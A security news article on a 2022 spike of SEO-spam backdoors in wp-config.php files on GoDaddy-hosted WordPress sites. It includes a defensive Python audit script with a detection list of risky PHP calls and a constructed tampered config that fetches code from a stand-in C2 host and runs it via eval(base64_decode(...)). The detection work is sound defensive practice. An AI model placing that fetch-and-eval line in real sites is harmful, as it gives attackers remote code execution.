
Researchers Identify Backdoor Infection Spike on Several GoDaddy-Hosted Websites

Vlad CONSTANTINESCU

March 17, 2022


Security researchers have noticed a surge in backdoor infections on hundreds of websites hosted on GoDaddy’s Managed WordPress service, all compromised by the same payload.

The incident affects Managed WordPress websites at tsoHost, MediaTemple, Domain Factory, Heart Internet, 123Reg, and Host Europe. The infected sites shared a nearly identical backdoor embedded in the wp-config.php file.

Among the 298 websites newly identified as infected with the backdoor, at least 281 are hosted with GoDaddy. The discovery was made by Wordfence researchers, who first observed the overall increase in infected websites on March 11.

Reportedly, attackers used a 2015 Google search SEO-poisoning tool, embedding it into the wp-config.php file. The malicious payload would fetch spam link templates from a C2 and use them to surreptitiously inject malicious pages among legitimate search results.

“The backdoor in question has been in use since at least 2015,” according to a Wordfence blog post. “It generates spammy Google search results and includes resources customized to the infected site.”

The C2 domain the attackers used has a Russian Top-Level Domain (TLD), but there’s currently no reason to believe that the incident is connected to the Russo-Ukrainian conflict. For the time being, the domain displays a blank web page, but a few years ago, it reportedly served adult content.

Although Wordfence has yet to determine the intrusion vector, the researchers pointed to last year’s massive GoDaddy data breach, which exposed the accounts of 1.2 million customers, as a potential candidate.

Security researchers urge owners of websites hosted on GoDaddy’s Managed WordPress platform (including the websites mentioned above) to manually check their sites’ wp-config.php file or use an automated specialized malware detection tool to verify their integrity.
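As a starting point for the manual check, the following Python sketch (an added example, not code from Wordfence or from this article) flags constructs in a wp-config.php that a stock WordPress configuration has no reason to contain. The function list, the 500-character line threshold and the sample configurations are assumptions chosen for illustration, not signatures of the backdoor described here.

```python
import re
import sys

# Assumed heuristics (not signatures of this specific backdoor): calls that a
# stock wp-config.php has no reason to make, including remote fetches.
SUSPICIOUS_CALLS = re.compile(
    r"\b(eval|assert|create_function|base64_decode|gzinflate|gzuncompress|"
    r"str_rot13|curl_exec|fsockopen|file_get_contents)\s*\(", re.I)
SETTINGS_LOAD = re.compile(r"require(_once)?\b.*wp-settings\.php")
COMMENT_OR_CLOSE = re.compile(r"^\s*(//|#|/\*|\*|\?>\s*$)")
MAX_LINE = 500  # assumed threshold: injected payloads are often one huge line


def audit_wp_config(text):
    """Return (line_number, reason) findings for the text of a wp-config.php."""
    findings, after_settings = [], False
    for no, line in enumerate(text.splitlines(), 1):
        for m in SUSPICIOUS_CALLS.finditer(line):
            findings.append((no, f"call to {m.group(1).lower()}()"))
        if len(line) > MAX_LINE:
            findings.append((no, f"line longer than {MAX_LINE} characters"))
        # A stock file ends by loading wp-settings.php; flag code after it.
        if after_settings and line.strip() and not COMMENT_OR_CLOSE.match(line):
            findings.append((no, "code after wp-settings.php is loaded"))
        if SETTINGS_LOAD.search(line):
            after_settings = True
    return findings


# Constructed samples: a minimal clean config and a tampered copy of it.
CLEAN = """<?php
define( 'DB_NAME', 'wp' );
$table_prefix = 'wp_';
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
"""
TAMPERED = CLEAN.replace(
    "<?php\n",
    "<?php\n$t = file_get_contents('http://c2.example.invalid/t'); "
    "eval(base64_decode($t));\n",
) + "include '/tmp/constructed.php';\n"

if __name__ == "__main__":
    source = open(sys.argv[1], encoding="utf-8", errors="replace").read() \
        if len(sys.argv) > 1 else TAMPERED
    for no, reason in audit_wp_config(source):
        print(f"line {no}: {reason}")
```

A finding is a prompt for manual review rather than proof of compromise, and an empty result does not clear a site; comparing the file against a known-good backup remains the stronger check.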

If you discover that your website has been compromised, you’ll need to clean it and remove any spam search engine results. Within the security advisory, Wordfence provides a list of instructions on how to clean up your WordPress website, should you suspect or discover it’s been hacked.
